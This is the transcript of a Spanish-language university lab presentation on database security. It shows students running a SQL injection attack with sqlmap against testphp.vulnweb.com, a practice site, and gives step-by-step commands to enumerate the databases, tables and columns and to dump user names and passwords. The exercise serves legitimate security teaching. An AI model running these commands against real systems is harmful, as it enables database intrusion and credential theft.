Ataque sql web

15
Universidad Nacional Abierta y a Distancia (UNAD) SEGURIDAD EN BASES DE DATOS Ataque con inyección de código SQL a sitio web Grupo 233009_17

Transcript of Ataque sql web

Universidad Nacional Abierta y a Distancia (UNAD)

SEGURIDAD EN BASES DE DATOS

Ataque con inyección de código SQL a sitio web Grupo 233009_17

INTRODUCCIÓN

• Un sistema de protección deberá tener la flexibilidad suficiente para poder imponer una diversidad de políticas y mecanismos.

• Los ataques a las páginas web y las bases de datos son un tema critico de filtrado de información para cada organización, por ello debemos conocer cómo se realizan y su fin para así proteger y salvaguardar la información.

OBJETIVOS

• Realizar ataque por inyección de código SQL a un sitio Web.

• Identificar los posibles ataques a los cuales se puede exponer un sistema de información.

• Conocer técnicas para detectar los posibles ataques a los sistemas de información

DESARROLLO DE LA ACTIVIDAD

Realizar un ataque a la base de datos del sitio http://testphp.vulnweb.com , con lo cual se debe obtener toda la información sobre la base de datos por ejemplo servidor de BD y versión, nombre de la base de datos, nombre de las tablas, información de las tablas, información de las columnas, etc.

Lo primero que debemos es definir de qué modo se realizará el ataque, ya sea por sistema operativo Linux o por Microsoft. Para este caso se realizará con Microsoft.

Luego de definir el sistema para el ataque se procede a descargar un programa para realizar ataque por inyección de código SQL se sugiere SQLMAP ( http://sqlmap.org/) o Nmap (http://nmap.org/download.html) y el programa Pyntos

Una vez descargados se necesita que la carpeta comprimida de sqlmap sea instalada en el mismo lado o unidad como se observa en la imagen.

Ahora validamos que la pagina suministrada sea vulnerable a ataques, esto se hace agregando el apostrofo ‘ al final de url. Url a validar: http://testphp.vulnweb.com

Una vez analizada y verificado el posible ataque a realizar, procedemos a ubicarnos en por línea de comandos en la carpeta sqlmap con el comando

cd .., de la siguiente manera:

Y una vez ubicados en la carpeta sqlmap, comenzamos con la ejecución de comando.

Ejecución de comando para averiguar nombre de la base de datos:

sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 –dbs

Ejecución de comando: sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 --current-db ;para extraer información de la base de datos

Comando para extraer el nombre de las tablas de la base de datos: sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 –D acuart --tables

Comando para extraer las columnas de la base de datos: sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 –T user --columns

Comando para extraer datos de las columnas de la base de datos: sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T user -C name –dump

Comando para validar password: sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=2 -D acuart -T user -C pass –dump